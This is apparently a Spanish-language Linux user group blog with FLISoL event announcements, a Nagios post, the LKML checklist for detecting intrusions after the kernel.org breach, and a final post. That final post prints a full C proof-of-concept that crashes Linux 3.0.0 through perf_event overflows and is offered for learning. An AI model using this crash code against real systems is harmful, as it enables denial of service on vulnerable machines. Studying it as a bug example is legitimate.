FLISoL 2015 – Lanús

FLISoL 2015

Te invitamos el sabado 25 de abril, desde las 9:00 hasta las 13:00 al Festival de instalación de Software Libre Latinoamericano de este año, o «FLISOL 2015».

Como todos los años desde el inicio del festival, el grupo de usuarios de GNU/Linux y software libre Lanux te invita a participar de este festival en la sede de la ciudad de Lanus, la entrada obviamente es totalmente libre y gratuita.

Además de realizar instalaciones de GNU/Linux y otros Software Libre, vamos a aprovechar para aclarar dudas, y dar algunas charlas introductorias a GNU/Linux, software y cultura libre. Podés venir con un pendrive o memoria flash y copiarte una distro, con una PC/Notebook para llevarte una instalada, o venir solo por las charlas. Para inscribirte hace click Aquí.

¿Qué es el FLISOL?

El Festival Latinoamericano de Instalación de Software Libre (FLISOL), es el mayor evento de difusión del Software libre que se realiza desde el año 2005 en diferentes países de manera simultánea. En el año 2008 participaron más de 200 ciudades en 18 países de Latinoamérica, y se adoptó su realización el 4to Sábado de abril de cada año. Es una oportunidad para todas aquellas personas interesadas en conocer más acerca del software libre. Participando es posible entrar en contacto con el mundo del software libre, conocer a otros usuarios, resolver dudas e interrogantes, intercambiar opiniones y experiencias, asistir a charlas, talleres y otras actividades programadas.

¿En qué consiste?

Es un evento en el que se instala, de manera gratuita y totalmente legal, software libre en las computadoras que llevan los asistentes. Además, se ofrecen charlas, ponencias y talleres acerca de temáticas locales, nacionales e internacionales.

¿A quién está dirigido?

El evento está dirigido a todo tipo de público: estudiantes, docentes, académicos, empresarios, trabajadores, funcionarios públicos, entusiastas y personas que no poseen mucho conocimiento informático.

¿Donde se realiza?

El encuentro será en la Universidad Argentina “John. F. Kennedy” Av. Hipólito Yrigoyen 4651 -Partido de Lanús- el día Sábado 25 de Abril de 9:00 hs a 13:00hs.
View Larger Map

Si te queda lejos, podes consultar el listado de sedes en Argentina o al sitio oficial y buscar la ciudad mas cercana en cualquier parte de latinoamerica.

¿Qué es lo que tengo que llevar?

Tenés que traer tú PC, esta debe tener espacio libre en el disco. Si queres instalar GNU/Linux, te pedimos que antes de venir defragmentes cualquier partición de Windows que tengas, para ahorrar tiempo.

 

Nagios – Infografía

Siguiendo con la actualización de la Wik y las mejoras de documentación, estuve armando unas infografías simples, aca subo una de ellas.

infografia_nagiosAdemás estuve modificando el aspecto visual de la Wiki y deje el tema por default de dokuwiki.

Personalmente me parece que para entradas largas, no es muy claro a la hora de definir títulos diferentes, por eso recomiendo exportar a ODT para poder leer mejor

http://wiki.cayu.com.ar/doku.php?id=manuales:nagios

Festival Latinoamericano de Instalación de Software Libre (FLISoL) 2013

Sobre FLISOL en Lanús (Buenos Aires)

Para promover el uso de Software Libre y la integración de comunidades de usuarios de Software Libre LANUX se suma a este festival

El 27 de abril se viene el Flisol o Festival Latinoamericano de Instalación de Software Libre, el evento de difusión de Tecnologías Libres más grande en Latinoamérica.

Su principal objetivo es promover el uso de software, tecnologías y contenidos libres, dando a conocer su filosofía, alcances, avances y desarrollos en el ámbito artístico, académico y empresarial.

Como todos los años en Lanúsla organizamos nosotros y se realizará en la Universidad Kennedy (sede Lanús).

No podes faltar!

Además de realizar instalaciones de GNU/Linux y otros Software Libre, vamos a aprovechar para aclarar dudas, y dar algunas charlas introductorias a Linux.

También se copiaran CD’s de diferentes distribuciones y de Software Libre para todas las plataformas.

Tenés que traer tú PC, esta debe tener espacio libre en el disco. Si queres instalar GNU/Linux, te pedimos que antes de venir defragmentes cualquier partición de Windows que tengas, para ahorrar tiempo.

Lugar

Universidad Kennedy de Lanús (Av. Hipólito Yrigoyen 4651 a 50 mtrs de la estación).



Actividades

 

Aunque la atracción principal del evento es la instalación de software libre en las computadoras que traen los participantes, también se darán charlas introductorias sobre software libre o proyectos relacionados. Este año incluiremos las siguientes charlas:

  • Primeros pasos en Linux y el Software Libre Software Libre vs Software Privativo.
  • Alternativas Libres ¿Qué programas libres hay para reemplazar a los que ya utilizo?
  • Raspberry Pi Que se puede hacer con esta mini computadora super económica y como conseguirla.
  • Privacidad en épocas de la «nube» ¿Intercambiando comodidad por privacidad?

Mas info en el sitio Web de Lanux

Festival Latinoamericano de Instalación de Software Libre (FLISoL) 2012

Sobre FLISOL en Lanús (Buenos Aires)

Para promover el uso de Software Libre y la integración de comunidades de usuarios de Software Libre LANUX se suma a este festival, y te invita a participar el día Sábado 28 de Abril de 10:00 hs a 16:30hs.

No podes faltar!

Además de realizar instalaciones de GNU/Linux y otros Software Libre, vamos a aprovechar para aclarar dudas, y dar algunas charlas introductorias a Linux.

También se copiaran CD’s de diferentes distribuciones y de Software Libre para todas las plataformas.

Tenés que traer tú PC, esta debe tener espacio libre en el disco. Si queres instalar GNU/Linux, te pedimos que antes de venir defragmentes cualquier partición de Windows que tengas, para ahorrar tiempo. Recomendamos leer a todos los usarios la siguiente guía.

Lugar y Horario

Universidad Kennedy de Lanús (Av. Hipólito Yrigoyen 4651 a 50 mtrs de la estación)
desde las 10:00 hasta las 16:30





Actividades

Horario Actividad Comentarios útiles
10:00 – 10:30 Inscripción
10:30 – 11:00 Pequeña introducción al evento
11:00 – 13:00 Primer sesión de instalaciones Se instalará Linux al primer grupo
13:00 – 14:30 Almuerzo Salida para almorzar
14:30 – 16:30 Segunta sesión de instalaciones Se instalará Linux al segundo grupo
16:30 Fin del evento

Registración

Para inscribirte hace click Aquí.

Nota: ingresá los datos de tu PC ej: capacidad Disco Rígido, si es IDE,PATA, SATA,SCSI, cantidad de memoria, Procesador, si es posible el chipset del mother/video/red.Lo más detallado posible, nos ayudará a prepararno para la instalación. Gracias!

Organización

* Grupo de usuarios de GNU/Linux de Lanús Lanux (http://www.lanux.org.ar)

Como Ayudar

Para colaborar en la organización y/o realización del evento puede contactarte desde la lista de correo

Lanux reunión aniversario

El grupo de usuarios de GNU/Linux de la ciudad de Lanús «LANUX», lo invita a participar el sábado 5 de Noviembre próximo a su reunión mensual con charlas técnicas a realizarse en la sede de la Universidad Kennedy ubicada en la Av. Hipolito Yrigoyen 4651, Lanús. Jornada especial con motivo de los 20 años de Linux y los 10 años de formación
de nuestro LUG «LANUX».

11:00 hs – Desayuno e introducción al Software Libre.

Charlas técnicas (12:00hs – 16:30hs):
Alta disponibilidad en GNU/Linux (Heartbeat+Pacemaker)


Cacheando contenido dinámico con SQUID y url-rewriters (SQUID/Grooveshark)

Cuevana LTA (Clonando Cuevana sin extensiones con HTML5)

Introducción a la telefonía IP con software libre (Asterisk VoIP)

Los esperamos!!

Lanux – Grupo de usuarios de GNU/Linux de Lanus
Visitanos en: http://www.lanux.org.ar

————–

Algunas fotos de lo que fue la Reunión 🙂

 

 

Vuelve Kernel.org (parcialmente)

Después del grave problema de seguridad vuelve Kernel.org, aunque con cosas parciales, estuve bajando el código del Kernel últimamente de github, pero no es muy cómodo que digamos

aca un mail de recomendación para los desarrolladores del núcleo de la lista de correo de LKML (es bueno también como recomendación para tener en cuenta para todos los días en la computadora de casa)

The compromise of kernel.org and related machines has made it clear that
some developers, at least, have had their systems penetrated.  As we
seek to secure our infrastructure, it is imperative that nobody falls
victim to the belief that it cannot happen to them.  We all need to
check our systems for intrusions.  Here are some helpful hints as
proposed by a number of developers on how to check to see if your Linux
machine might be infected with something:


0. One way to be sure that your system is not compromised is to simply
   do a clean install; we can all benefit from a new start sometimes.
   Before reinstalling any systems, though, consider following the steps
   below to learn if your system has been hit or not.

1. Install the chkrootkit package from your distro repository and see if it
   reports anything.  If your distro doesn't have the chkroot package,
   download it from:
	http://www.chkrootkit.org/

   Another tool is the ossec-rootcheck tool which can be found at:
	http://www.ossec.net/main/rootcheck

   And another one is the rkhunter program:
   	http://www.rootkit.nl/projects/rootkit_hunter.html
   [Note, this tool has the tendancy to give false-positives on some
   Debian boxes, please read /usr/share/doc/rkhunter/README.Debian.gz if
   you run this on a Debian machine]

2. Verify that your package signatures match what your package manager thinks
   they are.

   To do this on a rpm-based system, run the following command:
   	rpm --verify --all
   Please read the rpm man page for information on how to interpret the
   output of this command.

   To do this on a Debian based system, run the following bash snippet:
	dpkg -l \*|while read s n rest; do if [ "$s" == "ii" ]; then echo $n;
	fi; done > ~/tmp.txt
	for f in `cat ~/tmp.txt`; do debsums -s -a $f; done
   If you have a source-based system (Gentoo, LFS, etc.) you presumably
   know what you are doing already.

3. Verify that your packages are really signed with the distro's keys.

   Here's a bash snippet that can do this on a rpm based system to
   verify that the packages are signed with any key, not necessarily
   your distro's key.  That exercise is left for the reader:

	for package in `rpm -qa`; do
		sig=`rpm -q --qf '%{SIGPGP:pgpsig}\n' $package`
		if [ -z "$sig" ] ; then
			# check if there is a GPG key, not a PGP one
			sig=`rpm -q --qf '%{SIGGPG:pgpsig}\n' $package`
			if [ -z "$sig" ] ; then
				echo "$package does not have a signature!!!"
			fi
		fi
	done
   Unfortunately there is no known way of verifying this on Debian-based
   systems.

4. To replace a package that you find suspect, uninstall it and install
   it anew from your distro.  For example, if you want to reinstall the
   ssh daemon, you would do:
	$ /etc/init.d/sshd stop
	rpm -e openssh
	zypper install openssh	# for openSUSE based systems
	yum install openssh	# for Fedora based systems

   Ideally do this from a live cdrom boot, using the 'rpm --root' option
   to point rpm at the correct location.


5. From a liveCD environment, look for traces such as:
   a. Rogue startup scripts in /etc/rc*.d and equivalent directories.
   b. Strange directories in /usr/share that do not belong to a package.
      This can be checked on an rpm system with the following bash snippet:
	for file in `find /usr/share/`; do
		package=`rpm -qf -- ${file} | grep "is not owned"`
		if [ -n "$package" ] ; then
			echo "weird file ${file}, please check this out"
		fi
	done
6. Look for mysterious log messages, such as:
   a. Unexpected logins in wtmp and /var/log/secure*, quite possibly
      from legitimate users from unexpected hosts.
   b. Any program trying to touch /dev/mem.
   c. References to strange (non-text) ssh version strings in
      /var/log/secure*.  These do not necessarily indicate *successful*
      breakins, but they indicate *attempted* breakins which means your
      system or IP address has been targeted.

7. If any of the above steps show possible signs of compromise, you
   should investigate further and identify the actual cause.  If it
   becomes clear that the system has indeed been compromised, you should
   certainly reinstall the system from the beginning, and change your
   credentials on all machines that this machine would have had access
   to, or which you connected to through this machine.  You will need
   to check your other systems carefully, and you should almost
   certainly notify the administrators of other systems to which you
   have access.

Finally, please note that these hints are not guaranteed to turn up
signs of a compromised systems.  There are a lot of attackers out there;
some of them are rather more sophisticated than others.  You should
always be on the alert for any sort of unexpected behavior from the
systems you work with.


thanks,

Linux 3.0.0 crash oflo_sw_cpu_clock_crash

Mirando sitios como http://1337day.com/ y http://www.gossamer-threads.com/ encontre uno de tantos bugs para el kernel 3.0, pero aca hay un ejemplo de explotación de uno, esta bueno para aprender un poco mas de funcionamiento del Kernel. Ademas en gossamer-threads pueden encontrar varios mensajes de listas de correo muy interesantes

Básicamente tenemos un crash en el SO, lo que esta bueno es que al ser un código pequeño se puede analizar fácilmente

/* Error with overflows and perf::perf_count_sw_cpu_clock                    */
/* This test will crash Linux 3.0.0                                          */
/* compile with gcc -O2 -o oflo_sw_cpu_clock_crash oflo_sw_cpu_clock_crash.c */

/* by Vince Weaver <vweaver1 _at_ eecs.utk.edu>                              */

#define _GNU_SOURCE 1

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <fcntl.h>

#include <linux/perf_event.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <asm/unistd.h>
#include <sys/ioctl.h>

#include <sys/mman.h>

#include <signal.h>

#include <sys/prctl.h>

#define MATRIX_SIZE 512
static double a[MATRIX_SIZE][MATRIX_SIZE];
static double b[MATRIX_SIZE][MATRIX_SIZE];
static double c[MATRIX_SIZE][MATRIX_SIZE];

static void naive_matrix_multiply(int quiet) {

  double s;
  int i,j,k;

  for(i=0;i<MATRIX_SIZE;i++) {
    for(j=0;j<MATRIX_SIZE;j++) {
      a[i][j]=(double)i*(double)j;
      b[i][j]=(double)i/(double)(j+5);
    }
  }

  for(j=0;j<MATRIX_SIZE;j++) {
     for(i=0;i<MATRIX_SIZE;i++) {
        s=0;
        for(k=0;k<MATRIX_SIZE;k++) {
	   s+=a[i][k]*b[k][j];
	}
        c[i][j] = s;
     }
  }

  s=0.0;
  for(i=0;i<MATRIX_SIZE;i++) {
    for(j=0;j<MATRIX_SIZE;j++) {
      s+=c[i][j];
    }
  }

  if (!quiet) printf("Matrix multiply sum: s=%lf\n",s);

  return;
}

static int total=0;

void our_handler(int signum,siginfo_t *oh, void *blah) {

  int fd=oh->si_fd;

  ioctl(fd , PERF_EVENT_IOC_DISABLE,0);
  total++;
  ioctl(fd , PERF_EVENT_IOC_REFRESH,1);
}

int perf_event_open(struct perf_event_attr *hw_event_uptr,
		    pid_t pid, int cpu, int group_fd, unsigned long flags) {

  return syscall(__NR_perf_event_open,hw_event_uptr,pid,cpu,group_fd,flags);

}

int main( int argc, char **argv ) {

	int fd;
	void *blargh;

	struct perf_event_attr pe;

	struct sigaction sa;

	memset(&sa, 0, sizeof(struct sigaction));
	sa.sa_sigaction=our_handler;
	sa.sa_flags=SA_SIGINFO;

	if (sigaction(SIGIO,&sa,NULL)<0) {
	  fprintf(stderr,"Error setting up signal handler\n");
	  exit(1);
	}

        memset(&pe,0,sizeof(struct perf_event_attr));	
	pe.type=PERF_TYPE_SOFTWARE;
	pe.size=sizeof(struct perf_event_attr);
        pe.config=PERF_COUNT_SW_CPU_CLOCK;
	pe.sample_period=100000;
	pe.sample_type=PERF_SAMPLE_IP;
	pe.read_format=PERF_FORMAT_GROUP|PERF_FORMAT_ID;
	pe.disabled=1;
	pe.pinned=1;
	pe.exclude_kernel=1;
	pe.exclude_hv=1;
	pe.wakeup_events=1;

	fd=perf_event_open(&pe,0,-1,-1,0);
	if (fd<0) {
	   printf("Error opening\n");
	}

	blargh=mmap(NULL,(1+2)*4096,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0);
	fcntl(fd,F_SETFL,O_RDWR|O_NONBLOCK|O_ASYNC);
	fcntl(fd,F_SETSIG,SIGIO);
	fcntl(fd,F_SETOWN,getpid());

	ioctl(fd,PERF_EVENT_IOC_RESET,0);
	ioctl(fd,PERF_EVENT_IOC_ENABLE,0);

	naive_matrix_multiply(0);

	ioctl(fd,PERF_EVENT_IOC_DISABLE,0);
	munmap(blargh,(1+2)*4096);
	close(fd);

	printf("Total overflows: %d\n",total);

	return 0;
}

Referencias :
http://1337day.com/exploits/16813
http://www.gossamer-threads.com/lists/engine?do=post_attachment;postatt_id=43808;list=linux
http://www.securityhome.eu/exploits/